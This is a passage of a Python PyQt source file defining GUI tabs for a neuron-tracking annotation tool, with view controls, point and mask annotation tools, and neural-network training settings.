        row += 1
        # --- gamma slider ---
        gamma_lay = QVBoxLayout()
        gamma_slider = QSlider(Qt.Horizontal)
        gamma_slider.setMinimum(1)
        gamma_slider.setMaximum(100)
        gamma_slider.setValue(40)
        gamma_slider.valueChanged.connect(lambda val: self.controlled_plot.change_gamma(val))
        gamma_lay.addWidget(QLabel("Gamma"))
        gamma_lay.addWidget(gamma_slider)
        view_tab_grid.addLayout(gamma_lay, row, 0)
        row += 1
        # --- red/green channel blend sliders ---
        blend_slider_lay = QGridLayout()
        blend_slider_lay.addWidget(QLabel("Blender Red"), 0, 0)
        blend_slider_lay.addWidget(QLabel("Blender Green"), 0, 1)
        blend_slider_r = QSlider(Qt.Horizontal)
        blend_slider_r.setMinimum(0)
        blend_slider_r.setMaximum(100)
        blend_slider_r.setValue(100)
        blend_slider_r.valueChanged.connect(lambda val: self.controlled_plot.change_blend_r(val))
        blend_slider_lay.addWidget(blend_slider_r, 1, 0)
        blend_slider_g = QSlider(Qt.Horizontal)
        blend_slider_g.setMinimum(0)
        blend_slider_g.setMaximum(100)
        blend_slider_g.setValue(100)
        blend_slider_g.valueChanged.connect(lambda val: self.controlled_plot.change_blend_g(val))
        blend_slider_lay.addWidget(blend_slider_g, 1, 1)
        view_tab_grid.addLayout(blend_slider_lay, row, 0)
        row += 1
        # --- low/high intensity threshold sliders ---
        thres_slider_lay = QGridLayout()
        thres_slider_lay.addWidget(QLabel("Threshold Low"), 0, 0)
        thres_slider_lay.addWidget(QLabel("Threshold High"), 0, 1)
        thres_slider_l = QSlider(Qt.Horizontal)
        thres_slider_l.setMinimum(0)
        thres_slider_l.setMaximum(100)
        thres_slider_l.setValue(0)
        thres_slider_l.valueChanged.connect(lambda val: self.controlled_plot.change_low_thresh(val))
        thres_slider_h = QSlider(Qt.Horizontal)
        thres_slider_h.setMinimum(0)
        thres_slider_h.setMaximum(100)
        thres_slider_h.setValue(100)
        thres_slider_h.valueChanged.connect(lambda val: self.controlled_plot.change_high_thresh(val))
        thres_slider_lay.addWidget(thres_slider_l, 1, 0)
        thres_slider_lay.addWidget(thres_slider_h, 1, 1)
        view_tab_grid.addLayout(thres_slider_lay, row, 0)
        row += 1
        if as_points:
            # view_tab_grid.addWidget(QLabel("------------ Point mode ------------"), row, 0)
            # row += 1
            # --- point-mode overlays: current points and NN prediction ---
            first_lay = QGridLayout()
            curr_CheckBox = QCheckBox("Overlay Current Points")
            curr_CheckBox.setChecked(True)
            curr_CheckBox.toggled.connect(self.controller.toggle_pts_overlay)
            first_lay.addWidget(curr_CheckBox, 0, 0)
            NN_CheckBox = QCheckBox("Overlay NN Prediction")
            NN_CheckBox.setChecked(True)
            NN_CheckBox.toggled.connect(self.controller.toggle_NN_overlay)
            first_lay.addWidget(NN_CheckBox, 0, 1)
            view_tab_grid.addLayout(first_lay, row, 0)
            row += 1
            # --- track overlay with past/future frame windows ---
            overlay_tracks_lay = QGridLayout()
            overlay_tracks_CheckBox = QCheckBox("Overlay Tracks")
            overlay_tracks_CheckBox.setChecked(True)
            overlay_tracks_CheckBox.toggled.connect(self.controller.toggle_track_overlay)
            overlay_tracks_lay.addWidget(overlay_tracks_CheckBox, 0, 0, 1, 2)
            ov_tr_past = QLineEdit("-5")
            ov_tr_past.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
            ov_tr_past.setValidator(QtGui.QIntValidator(-15, 0))
            ov_tr_past.textChanged.connect(lambda x: self.controller.change_track_past(x))
            ov_tr_future = QLineEdit("5")
            ov_tr_future.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
            ov_tr_future.setValidator(QtGui.QIntValidator(0, 15))
            ov_tr_future.textChanged.connect(lambda x: self.controller.change_track_future(x))
            overlay_tracks_lay.addWidget(QLabel("Past"), 1, 0)
            overlay_tracks_lay.addWidget(QLabel("Future"), 1, 1)
            overlay_tracks_lay.addWidget(ov_tr_past, 2, 0)
            overlay_tracks_lay.addWidget(ov_tr_future, 2, 1)
            view_tab_grid.addLayout(overlay_tracks_lay, row, 0)
            row += 1
            # --- adjacent-points overlay (offset entered in the line edit) ---
            adjLayout = QHBoxLayout()
            getadj = QLineEdit("-1")
            getadj.setValidator(QtGui.QIntValidator(-10, 10))
            getadj.textChanged.connect(lambda x: self._adjacent_changed(x))
            self.getadjlab = QLabel("-1")
            adj_CheckBox = QCheckBox("Overlay Adjacent Points")
            adj_CheckBox.toggled.connect(self.controller.toggle_adjacent_overlay)
            adjLayout.addWidget(adj_CheckBox)
            adjLayout.addWidget(getadj)
            adjLayout.addWidget(self.getadjlab)
            view_tab_grid.addLayout(adjLayout, row, 0)
            row += 1
        else:
            # view_tab_grid.addWidget(QLabel("------------ Mask mode ------------"), row, 0)
            # row += 1
            # SJR: I copied the code from above and got rid of point-specific stuff
            mask_boxes = QGridLayout()
            mask_checkbox = QCheckBox("Overlay Mask")
            mask_checkbox.setChecked(int(default_values["overlay_mask_by_default"]))
            mask_checkbox.toggled.connect(self.controller.toggle_mask_overlay)
            mask_boxes.addWidget(mask_checkbox, 0, 0)
            # MB: the following 3 lines is for overlaying the NN mask
            NNmask_checkbox = QCheckBox("Only NN mask")
            NNmask_checkbox.setChecked(False)
            NNmask_checkbox.toggled.connect(self.controller.toggle_NN_mask_only)
            mask_boxes.addWidget(NNmask_checkbox, 0, 1)
            aligned_checkbox = QCheckBox("Aligned")
            aligned_checkbox.setChecked(False)
            aligned_checkbox.toggled.connect(self.controller.toggle_display_alignment)
            mask_boxes.addWidget(aligned_checkbox, 0, 2)
            cropped_checkbox = QCheckBox("Cropped")
            cropped_checkbox.setChecked(False)
            cropped_checkbox.toggled.connect(self.controller.toggle_display_cropped)
            mask_boxes.addWidget(cropped_checkbox, 0, 3)
            view_tab_grid.addLayout(mask_boxes, row, 0)
            row += 1
            # SJR: code below is for blurring button and slider
            blur_checkbox = QCheckBox("Blur image")
            blur_checkbox.toggled.connect(self.controlled_plot.change_blur_image)
            view_tab_grid.addWidget(blur_checkbox, row, 0)
            row += 1
            blur_slider_lay = QGridLayout()
            blur_slider_lay.addWidget(QLabel("Blur sigm parameter"), 0, 0)
            blur_slider_lay.addWidget(QLabel("Blur bg_factor parameter"), 0, 1)
            blur_slider_s = QSlider(Qt.Horizontal)
            blur_slider_s.setMinimum(1)
            blur_slider_s.setMaximum(10)
            blur_slider_s.setValue(1)
            blur_slider_s.valueChanged.connect(lambda val: self.controlled_plot.change_blur_s(val))
            blur_slider_lay.addWidget(blur_slider_s, 1, 0)
            blur_slider_b = QSlider(Qt.Horizontal)
            blur_slider_b.setMinimum(0)
            blur_slider_b.setMaximum(100)
            blur_slider_b.setValue(25)
            blur_slider_b.valueChanged.connect(lambda val: self.controlled_plot.change_blur_b(val))
            blur_slider_lay.addWidget(blur_slider_b, 1, 1)
            view_tab_grid.addLayout(blur_slider_lay, row, 0)
            row += 1
            # SJR: code above is for blurring button and slider
            self.setWidgetResizable(True)
            self.setContentsMargins(5, 5, 5, 5)
        # install the grid into the scroll area
        lay = QWidget()
        lay.setLayout(view_tab_grid)
        self.setWidget(lay)
        self.setWidgetResizable(True)
        self.setContentsMargins(5, 5, 5, 5)
        # Todo no sideways scrolling

    def _adjacent_changed(self, value):
        """Relay a new 'adjacent points' offset to the controller; update the
        label only when the controller accepts the value."""
        ok = self.controller.change_adjacent(value)
        if ok:
            self.getadjlab.setText(str(int(value)))
class AnnotationTab(QScrollArea):
    """
    This is the tab with point and mask annotation tools.

    The tab is built in one of two mutually exclusive layouts, chosen at
    construction time from ``controller.point_data``:
      * point mode: approve/delete buttons for NN-predicted points plus the
        auto-center controls;
      * mask mode: mask-annotation, renumber/delete and permutation controls.
    The controller calls back into this tab via ``change_highlighted_neuron``,
    ``change_mask_thresh`` and ``change_autocenter_mode`` (registered below).
    """
    def __init__(self, controller, frame_num: int, mask_threshold_for_new_region):
        """
        :param controller: main controller to report to
        :param frame_num: number of frames in video
        :param mask_threshold_for_new_region: initial content of the
            mask-annotation threshold field; passed verbatim to a QLineEdit,
            so it is expected to be a string — TODO confirm at call site.
        """
        super().__init__()
        self.controller = controller
        # Register self so the controller can invoke the callback methods
        # defined at the bottom of this class.
        self.controller.highlighted_neuron_registered_clients.append(self)
        self.controller.mask_thres_registered_clients.append(self)
        self.controller.autocenter_registered_clients.append(self)
        # True -> annotations are points; False -> annotations are masks.
        as_points = self.controller.point_data
        self.as_points = as_points
        main_layout = QGridLayout()
        row = 0
        if as_points:
            # ------------ Point mode ------------
            # points_lab = QLabel("------------ Point mode ------------")
            # main_layout.addWidget(points_lab, row, 0)
            # row += 1
            subrow = 0
            approve_lay = QGridLayout()
            # Label text is rewritten with the highlighted neuron id and its
            # assigned key in change_highlighted_neuron().
            self.approve_lab = QLabel("Approve")
            approve_lay.addWidget(self.approve_lab, subrow, 0)
            subrow += 1
            self.delete_clear = QPushButton("Clear This frame")
            self.delete_clear.setStyleSheet("background-color: red")
            self.delete_clear.clicked.connect(self.controller.clear_frame_NN)
            approve_lay.addWidget(self.delete_clear, subrow, 0)
            subrow += 1
            # "Delete Within" acts on the frame interval typed in the two line
            # edits next to it; disabled until a neuron is highlighted.
            self.delete_select = QPushButton("Delete Within")
            self.delete_select.setStyleSheet("background-color: red")
            self.delete_select.clicked.connect(self._selective_delete)
            self.delete_select.setEnabled(False)
            approve_lay.addWidget(self.delete_select, subrow, 0)
            self.delete_select_from = QLineEdit("0")
            self.delete_select_from.setValidator(QtGui.QIntValidator(0, frame_num - 1))
            approve_lay.addWidget(self.delete_select_from, subrow, 1)
            self.delete_select_to = QLineEdit(str(frame_num - 1))
            self.delete_select_to.setValidator(QtGui.QIntValidator(0, frame_num - 1))
            approve_lay.addWidget(self.delete_select_to, subrow, 2)
            subrow += 1
            # Same pattern as above, but approves instead of deleting.
            self.approve_select = QPushButton("Approve Within")
            self.approve_select.setStyleSheet("background-color: green")
            self.approve_select.clicked.connect(self._selective_approve)
            self.approve_select.setEnabled(False)
            approve_lay.addWidget(self.approve_select, subrow, 0)
            self.approve_select_from = QLineEdit("0")
            self.approve_select_from.setValidator(QtGui.QIntValidator(0, frame_num - 1))
            approve_lay.addWidget(self.approve_select_from, subrow, 1)
            self.approve_select_to = QLineEdit(str(frame_num - 1))
            self.approve_select_to.setValidator(QtGui.QIntValidator(0, frame_num - 1))
            approve_lay.addWidget(self.approve_select_to, subrow, 2)
            subrow += 1
            main_layout.addLayout(approve_lay, row, 0)
            row += 1
            # Empty sub-layout kept as a placeholder row in the grid.
            rotate_lay = QGridLayout()
            main_layout.addLayout(rotate_lay, row, 0)
            row += 1
            fh_checkbox = QCheckBox("Follow Highlighted")
            fh_checkbox.setChecked(True)
            fh_checkbox.toggled.connect(self.controller.toggle_z_follow_highlighted)
            main_layout.addWidget(fh_checkbox, row, 0)
            row += 1
            # --- Auto-center controls -------------------------------------
            AutoCenterMode = QGridLayout()
            if True:  # NOTE(review): always-true block, serves only as visual grouping
                # Widget row 1: "nearest maximum intensity" mode and its X,Y / Z sizes.
                AutoCenterWidget1 = QHBoxLayout()
                en_AutoCenter = QLabel("Auto Center Size:")
                getSize_AutoCenter = QLineEdit("3")
                getSize_AutoCenter.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
                getSize_AutoCenter.setValidator(QtGui.QIntValidator(0, 10))
                getSize_AutoCenter.textChanged.connect(self._set_xy_autocenter)
                getSize_AutoCenterz = QLineEdit("2")
                getSize_AutoCenterz.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
                getSize_AutoCenterz.setValidator(QtGui.QIntValidator(0, 5))
                getSize_AutoCenterz.textChanged.connect(self._set_z_autocenter)
                # Labels echoing the currently applied sizes.
                self.autocenterlabxy = QLabel("3")
                self.autocenterlabz = QLabel("2")
                AutoCenterWidget1_btn = QRadioButton("Nearest maximum intensity")
                # NOTE(review): AutoCenterWidget1_btn has no toggled handler; mode
                # switching presumably relies solely on AutoCenterWidget2_btn's
                # toggle signal — verify this is intended.
                AutoCenterWidget1.addWidget(en_AutoCenter)
                AutoCenterWidget1.addWidget(QLabel("X,Y:"))
                AutoCenterWidget1.addWidget(self.autocenterlabxy)
                AutoCenterWidget1.addWidget(getSize_AutoCenter)
                AutoCenterWidget1.addWidget(QLabel("Z:"))
                AutoCenterWidget1.addWidget(self.autocenterlabz)
                AutoCenterWidget1.addWidget(getSize_AutoCenterz)
                # Widget row 2: "nearest peak" mode and its threshold/separation.
                AutoCenterWidget2 = QHBoxLayout()
                getthres_peaks = QLineEdit("4")
                getthres_peaks.setValidator(QtGui.QIntValidator(0, 255))
                getthres_peaks.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
                getthres_peaks.textChanged.connect(self._set_peak_thresh)
                self.peak_thres_lab = QLabel("4")
                getsep_peaks = QLineEdit("2")
                getsep_peaks.setValidator(QtGui.QIntValidator(0, 10))
                getsep_peaks.textChanged.connect(self._set_peak_sep)
                getsep_peaks.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
                self.peak_sep_lab = QLabel("2")
                AutoCenterWidget2.addWidget(QLabel("Intensity Threshold:"))
                AutoCenterWidget2.addWidget(self.peak_thres_lab)
                AutoCenterWidget2.addWidget(getthres_peaks)
                AutoCenterWidget2.addWidget(QLabel("Minimum Separation:"))
                AutoCenterWidget2.addWidget(self.peak_sep_lab)
                AutoCenterWidget2.addWidget(getsep_peaks)
                AutoCenterWidget2_btn = QRadioButton("Nearest Peak")
                AutoCenterWidget2_btn.setChecked(True)  # peak mode is the default
                AutoCenterWidget2_btn.toggled.connect(self.controller.toggle_autocenter_peakmode)
                # Indicator for whether autocenter is enabled (toggled with key [A]);
                # color is switched in change_autocenter_mode().
                autocenter_enable_lay = QHBoxLayout()
                autocenter_enable_lay.addWidget(QLabel("Autocenter Enabled [A]:"))
                self.auto_en_lab = QLabel(" ")
                self.auto_en_lab.setStyleSheet("background-color: green; height: 5px; width: 5px;min-width: 5px;")
                autocenter_enable_lay.addWidget(self.auto_en_lab)
                rowi = 0
                AutoCenterMode.addLayout(autocenter_enable_lay, rowi, 0, 1, 2)
                rowi += 1
                AutoCenterMode.addWidget(QLabel(" "), rowi, 0)
                AutoCenterMode.addWidget(QLabel("Select Auto Center Mode"), rowi, 1)
                rowi += 1
                AutoCenterMode.addWidget(AutoCenterWidget2_btn, rowi, 1)
                rowi += 1
                AutoCenterMode.addLayout(AutoCenterWidget2, rowi, 1)
                rowi += 1
                AutoCenterMode.addWidget(AutoCenterWidget1_btn, rowi, 1)
                rowi += 1
                AutoCenterMode.addLayout(AutoCenterWidget1, rowi, 1)
                rowi += 1
            main_layout.addLayout(AutoCenterMode, row, 0)
            row += 1
        else:
            # ------------ Mask mode ------------
            # mask_lab = QLabel("------------ Mask mode ------------")
            # main_layout.addWidget(mask_lab, row, 0)
            # row += 1
            # SJR: Annotate mask section in the annotate tab
            mask_annotation_Layout = QGridLayout()
            subrow = 0
            mask_annotation_checkbox = QCheckBox("Mask annotation mode")
            mask_annotation_checkbox.toggled.connect(self.controller.toggle_mask_annotation_mode)
            mask_annotation_Layout.addWidget(mask_annotation_checkbox, subrow, 0)
            # Threshold used when adding new regions; changes are pushed to the
            # controller live while typing.
            self.mask_annotation_thresh = QLineEdit(mask_threshold_for_new_region)
            self.mask_annotation_thresh.setValidator(QtGui.QIntValidator(1, 1000))
            self.mask_annotation_thresh.textChanged.connect(lambda x: self.controller.set_mask_annotation_threshold(x))
            mask_annotation_Layout.addWidget(self.mask_annotation_thresh, subrow, 1)
            mask_annotation_thresh_label = QLabel("Treshold for adding regions")
            mask_annotation_Layout.addWidget(mask_annotation_thresh_label, subrow, 2)
            subrow += 1
            box_mode_checkbox = QCheckBox("Boxing mode")
            box_mode_checkbox.toggled.connect(self.controller.toggle_box_mode)
            mask_annotation_Layout.addWidget(box_mode_checkbox, subrow, 0)
            # Free-text box spec parsed by the controller, format "W,H,D-box_id".
            self.box_dimensions = QLineEdit("1,1,1-0")
            self.box_dimensions.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
            self.box_dimensions.textChanged.connect(lambda x: self.controller.set_box_dimensions(x))
            mask_annotation_Layout.addWidget(self.box_dimensions, subrow, 1)
            boxing_dim_label = QLabel("Box details (W,H,D-box_id)")
            mask_annotation_Layout.addWidget(boxing_dim_label, subrow, 2)
            main_layout.addLayout(mask_annotation_Layout, row, 0)
            row += 1
            mask_buttons = QGridLayout()
            subrow = 0
            # When checked, renumber/delete act on the frame range below instead
            # of only the current frame (see _selective_renumber / _selective_mask_delete).
            self.change_within_checkbox = QCheckBox("Change within")
            mask_buttons.addWidget(self.change_within_checkbox, subrow, 0)
            self.mask_change_from = QLineEdit("0")
            self.mask_change_from .setValidator(QtGui.QIntValidator(0, frame_num - 1))
            mask_buttons.addWidget(self.mask_change_from , subrow, 1)
            mask_buttons.addWidget(QLabel("to:"), subrow, 2)
            # NOTE(review): this range tops out at frame_num while the point-mode
            # fields above use frame_num - 1 — possible off-by-one, confirm.
            self.mask_change_to = QLineEdit(str(frame_num))
            self.mask_change_to.setValidator(QtGui.QIntValidator(0, frame_num))
            mask_buttons.addWidget(self.mask_change_to, subrow, 3)
            subrow += 1
            self.renumber_mask_obj = QPushButton("Renumber")
            self.renumber_mask_obj.setStyleSheet("background-color: green")
            self.renumber_mask_obj.clicked.connect(self._selective_renumber)
            self.renumber_mask_obj.setEnabled(False)  # enabled once a neuron is highlighted
            mask_buttons.addWidget(self.renumber_mask_obj, subrow, 0)
            self.delete_mask_obj = QPushButton("Delete")
            self.delete_mask_obj.setStyleSheet("background-color: red")
            self.delete_mask_obj.clicked.connect(self._selective_mask_delete)
            self.delete_mask_obj.setEnabled(False)  # enabled once a neuron is highlighted
            mask_buttons.addWidget(self.delete_mask_obj, subrow, 1)
            main_layout.addLayout(mask_buttons, row, 0)
            row += 1
            # Cyclic permutation of cell identities (see _Permutation_fun).
            Permute_buttons = QGridLayout()
            self.cell_permutation_entry = QLineEdit("0")
            self.cell_permutation_entry.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
            Permute_buttons.addWidget(QLabel("Enter cell numbers separated with ,"), 0, 0)
            Permute_buttons.addWidget(self.cell_permutation_entry, 0, 1)
            Permute_btn = QPushButton("Permute")
            Permute_btn.setStyleSheet("background-color: yellow")
            Permute_btn.clicked.connect(self._Permutation_fun)
            Permute_buttons.addWidget(Permute_btn, 0, 2)
            main_layout.addLayout(Permute_buttons, row, 0)
        # Common tail: install the layout into this scroll area.
        wid = QWidget()
        wid.setLayout(main_layout)
        self.setWidget(wid)
        self.setWidgetResizable(True)
        self.setContentsMargins(5, 5, 5, 5)

    def _selective_delete(self):
        """Delete NN point predictions in the frame interval read from the GUI."""
        fro, to = int(self.delete_select_from.text()), int(self.delete_select_to.text())
        self.controller.clear_NN_selective(fro, to)

    def _selective_approve(self):
        """Approve NN point predictions in the frame interval read from the GUI."""
        fro, to = int(self.approve_select_from.text()), int(self.approve_select_to.text())
        self.controller.approve_selective(fro, to)

    def _selective_renumber(self):
        """Renumber the highlighted mask object.

        With "Change within" checked, renumber across the frame interval typed
        in the GUI; otherwise only in the current frame.
        """
        fro, to = int(self.mask_change_from.text()), int(self.mask_change_to.text())
        if self.change_within_checkbox.checkState():
            self.controller.renumber_All_mask_instances(fro, to)
        else:
            self.controller.renumber_mask_obj()

    def _selective_mask_delete(self):
        """Delete the highlighted mask object (interval or current frame, as above)."""
        fro, to = int(self.mask_change_from.text()), int(self.mask_change_to.text())
        if self.change_within_checkbox.checkState():
            self.controller.delete_All_mask_instances(fro, to)
        else:
            self.controller.delete_mask_obj()

    def _Permutation_fun(self):
        """Read comma-separated cell ids and request a cyclic mask permutation.

        The first id is appended at the end of the array so the controller
        receives the full cycle (e.g. "1,2,3" -> [1, 2, 3, 1]).
        """
        cells = self.cell_permutation_entry.text()
        cells = cells.split(',')
        cellarray = [int(k) for k in cells]
        cellarraycycle = np.zeros(len(cellarray) + 1)
        cellarraycycle[:-1] = cellarray
        cellarraycycle[len(cellarray)] = cellarray[0]
        self.controller.permute_masks(cellarraycycle)

    def _set_xy_autocenter(self, value):
        """textChanged callback: apply a new X,Y autocenter size."""
        try:
            int(value)
        except:  # field is empty or mid-edit; silently ignore
            return
        self.autocenterlabxy.setText(value)
        self.controller.set_autocenter(int(value), z=False)

    def _set_z_autocenter(self, value):
        """textChanged callback: apply a new Z autocenter size."""
        try:
            int(value)
        except:  # field is empty or mid-edit; silently ignore
            return
        self.autocenterlabz.setText(value)
        self.controller.set_autocenter(int(value), z=True)

    def _set_peak_thresh(self, value):
        """textChanged callback: apply a new peak intensity threshold."""
        try:
            value = int(value)
        except:  # field is empty or mid-edit; silently ignore
            return
        self.controller.set_peak_threshold(value)
        self.peak_thres_lab.setText(str(value))

    def _set_peak_sep(self, value):
        """textChanged callback: apply a new minimum peak separation."""
        try:
            value = int(value)
        except:  # field is empty or mid-edit; silently ignore
            return
        self.controller.set_peak_sep(value)
        self.peak_sep_lab.setText(str(value))

    def change_mask_thresh(self, value):
        """Controller callback: display a new mask threshold without re-emitting
        textChanged (signals are blocked to avoid a feedback loop)."""
        self.mask_annotation_thresh.blockSignals(True)
        self.mask_annotation_thresh.setText(str(value))
        self.mask_annotation_thresh.blockSignals(False)

    def change_highlighted_neuron(self, high: int = None, unhigh: int = None, high_key=None, **kwargs):
        """
        Callback when the highlighted neuron changes.

        Enables/disables the selective buttons and updates the "Approve" label.

        :param high: neuron id (from 1)
        :param unhigh: neuron id (from 1)
        :param high_key: key assigned to highlighted neuron (for display on the "approve" label)
        """
        if high is None and unhigh is not None:  # just unhighlight
            if self.as_points:
                self.approve_lab.setText("Approve")
                self.delete_select.setEnabled(False)
                self.approve_select.setEnabled(False)
            else:
                self.renumber_mask_obj.setEnabled(False)
                self.delete_mask_obj.setEnabled(False)
        elif high is not None:
            if high_key is None:
                key_name = " "
            else:
                key_name = " [" + high_key + "]"
            if self.as_points:
                self.approve_lab.setText("Approve: " + str(high) + key_name)
                self.delete_select.setEnabled(True)
                self.approve_select.setEnabled(True)
            else:
                self.renumber_mask_obj.setEnabled(True)
                self.delete_mask_obj.setEnabled(True)

    def change_autocenter_mode(self, on: bool):
        """Controller callback: recolor the autocenter indicator (green=on, red=off).

        Only meaningful in point mode; ignored for mask data.
        """
        if not self.as_points:
            return
        if on:
            self.auto_en_lab.setStyleSheet("background-color: green; height: 15px; width: 5px;min-width: 5px;")
        else:
            self.auto_en_lab.setStyleSheet("background-color: red; height: 15px; width: 5px;min-width: 5px;")
class NNControlTab(QScrollArea):
    """
    This is the tab that deals with NNs, launching them, retrieving their results...

    Built in one of two layouts depending on ``controller.point_data``:
    point mode embeds a TrackTab plus a helper-data selector; mask mode
    exposes mask selection, post-processing, approval and training controls.
    The controller calls back via ``change_NN_instances`` and
    ``change_validation_set`` (registered below).
    """
    def __init__(self, controller, data_name: str):
        """
        :param controller: main controller to report to
        :param data_name: name of the dataset
        """
        super().__init__()
        self.controller = controller
        self.controller.NN_instances_registered_clients.append(self)
        self.controller.validation_set_registered_clients.append(self)
        self.data_name = data_name
        as_points = self.controller.point_data
        self.as_points = as_points
        # Default post-processing mode. Bug fix: previously this attribute was
        # only assigned inside _select_pmode, so clicking "Post-process masks"
        # before ever touching the combo box raised AttributeError.
        self.post_process_mode = 1
        main_layout = QGridLayout()
        row = 0
        if as_points:
            # The TrackTab communicates with the rest of the app solely through
            # the controller (see discussion notes in the repo history).
            self.widget = TrackTab(self.controller)
            main_layout.addWidget(self.widget)
            # Todo move into TrackTab
            lab = QLabel("Select helper data")
            main_layout.addWidget(lab)
            # Combo box selecting helper data (NN results or other algorithms).
            self.NN_pt_select = QComboBox()
            self.NN_pt_select.currentTextChanged.connect(self._select_pt_instance)
            self.populate_point_NNinstances()
            main_layout.addWidget(self.NN_pt_select)
        else:
            # Combo box to select the NN from which to load masks.
            lab = QLabel("Select NN masks")
            main_layout.addWidget(lab, row, 0, 1, 2)
            row += 1
            self.NN_mask_select = QComboBox()
            self.NN_mask_select.currentTextChanged.connect(self._select_mask_instance)
            main_layout.addWidget(self.NN_mask_select, row, 0, 1, 2)
            row += 1
            # Comma-separated neuron ids excluded from (or targeted by, depending
            # on the mode) post-processing.
            self.Exempt_Neurons = QLineEdit("0")
            self.Exempt_Neurons.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
            main_layout.addWidget(QLabel("Neurons exempt from postprocessing:"), row, 0, 1, 1)  # TODO MB: exempt for modes 1-2, but target for modes 3-4-5; consider a mode-dependent label.
            main_layout.addWidget(self.Exempt_Neurons, row, 1, 1, 1)
            row += 1
            # Post-processing trigger and mode selector.
            PostProcess_mask = QPushButton("Post-process masks")
            PostProcess_mask.setStyleSheet("background-color: yellow")
            PostProcess_mask.clicked.connect(self._Postprocess_NN_masks)
            main_layout.addWidget(PostProcess_mask, row, 1, 1, 1)
            self.PostProc_Mode = QComboBox()
            self.PostProc_Mode.addItem("Post-processing mode")  # placeholder entry
            self.post_process_mode_name = ['merge neighbors', 'merge neighbors XY', 'merge selected cells',
                                           'delete disjoint', 'relabel neighbors to 1st']
            for mode_name in self.post_process_mode_name:
                self.PostProc_Mode.addItem(mode_name)
            self.PostProc_Mode.currentTextChanged.connect(self._select_pmode)
            main_layout.addWidget(self.PostProc_Mode, row, 0, 1, 1)
            row += 1
            # MB added: save the selected predicted masks as the GT masks.
            approve_mask = QPushButton("Approve masks")
            approve_mask.setStyleSheet("background-color: green")
            approve_mask.clicked.connect(self.controller.approve_NN_masks)
            main_layout.addWidget(approve_mask, row, 0, 1, 2)
            row += 1
            # MB added: display of the validation-frame ids (filled in by the
            # change_validation_set callback).
            val_frame_box = QtHelpers.CollapsibleBox("Validation frames id:")
            lay = QVBoxLayout()
            self.val_set_display = QLabel()
            self.val_set_display.setText("unknown at init")
            lay.addWidget(self.val_set_display)
            val_frame_box.setContentLayout(lay)
            main_layout.addWidget(val_frame_box, row, 0, 1, 2)
            row += 1
            # Training options.
            old_train_checkbox = QCheckBox("Use old train set")
            old_train_checkbox.toggled.connect(self.controller.toggle_old_trainset)
            main_layout.addWidget(old_train_checkbox, row, 0)
            deform_checkbox = QCheckBox("Add deformation")
            deform_checkbox.toggled.connect(self.controller.toggle_add_deformation)
            main_layout.addWidget(deform_checkbox, row, 1)
            row += 1
            main_layout.addWidget(QLabel("Number of target frames:"), row, 0)
            self.targset = QLineEdit("5")
            self.targset.setValidator(QtGui.QIntValidator(0, 200))
            main_layout.addWidget(self.targset, row, 1)
            row += 1
            # Validation / training set sizes and epoch count.
            subrow = 0
            options_checkboxes_lay = QGridLayout()
            options_checkboxes_lay.addWidget(QLabel("val:"), subrow, 0)
            self.valset = QLineEdit("1")
            self.valset.setValidator(QtGui.QIntValidator(0, 150))
            options_checkboxes_lay.addWidget(self.valset, subrow, 1)
            options_checkboxes_lay.addWidget(QLabel("train:"), subrow, 2)
            self.trainset = QLineEdit("6")
            self.trainset.setValidator(QtGui.QIntValidator(0, 150))
            options_checkboxes_lay.addWidget(self.trainset, subrow, 3)
            options_checkboxes_lay.addWidget(QLabel("epochs:"), subrow, 4)
            self.epochs = QLineEdit("100")
            self.epochs.setValidator(QtGui.QIntValidator(0, 1000))
            options_checkboxes_lay.addWidget(self.epochs, subrow, 5)
            subrow += 2
            main_layout.addLayout(options_checkboxes_lay, row, 0)
            row += 1
            NN_train = QPushButton("Train Mask Prediction Neural Network")
            NN_train.clicked.connect(self._run_mask_NN)
            NN_train_fol = QPushButton("Output Train NNmasks folder")
            NN_train_fol.clicked.connect(lambda: self._run_mask_NN(fol=True))
            main_layout.addWidget(NN_train, row, 0, 1, 2)
            row += 1
            main_layout.addWidget(NN_train_fol, row, 0, 1, 2)
            row += 1
            main_layout.addWidget(QLabel("Settings"), row, 0, 1, 2)
            row += 1
            # Model / instance selectors: changing the model repopulates the
            # instance list.
            self.NN_model_select = QComboBox()
            self.NN_instance_select = QComboBox()
            self.change_NN_instances()
            self.setup_mask_NNmodels()  # populate self.NN_model_select with the existing models
            self.populate_mask_NNinstances()
            self.NN_model_select.currentTextChanged.connect(self.populate_mask_NNinstances)
            main_layout.addWidget(self.NN_model_select, row, 0)
            main_layout.addWidget(self.NN_instance_select, row, 1)
            row += 1
        wid = QWidget()
        wid.setLayout(main_layout)
        self.setWidget(wid)
        self.setWidgetResizable(True)
        self.setContentsMargins(5, 5, 5, 5)

    @property
    def NNinstances(self):
        """
        Gets the NNinstances dict directly from the controller.
        Warning, this means self should never modify self.NNinstances.
        """
        return self.controller.NNinstances

    def _select_pt_instance(self, txt):
        """Combo callback: choose the helper data for point mode ("" / "None" clears it)."""
        if txt == "" or txt == "None":
            helper_name = None
        else:
            helper_name = txt
        self.controller.select_NN_instance_points(helper_name)

    def _select_mask_instance(self, txt):
        """Combo callback: choose the "<net> <instance>" pair whose masks to load."""
        if txt == "":
            net, instance = "", None
        else:
            net, instance = txt.split(" ")
        self.controller.select_NN_instance_masks(net, instance)

    def _select_pmode(self, txt):
        """Combo callback: map the selected mode name to its 1-based mode number.

        The empty string and the "Post-processing mode" placeholder both fall
        back to mode 1. Bug fix: selecting the placeholder previously raised
        ValueError from list.index.
        """
        if txt in self.post_process_mode_name:
            self.post_process_mode = self.post_process_mode_name.index(txt) + 1
        else:
            self.post_process_mode = 1

    def _run_script(self):
        pass

    def _run_mask_NN(self, fol=False):
        """Launch (after confirmation) a mask-NN training/prediction run.

        When the "new" pseudo-instance is selected, the user is prompted for a
        name; names containing whitespace, '.', '/' or equal to "new" are
        rejected. Bug fix: an invalid name previously only showed an error
        dialog and then still launched the run under the name "new" — we now
        abort instead.

        :param fol: if True, output the training NN-masks folder instead.
        """
        modelname = self.NN_model_select.currentText()
        instancename = self.NN_instance_select.currentText()
        if instancename == "new":
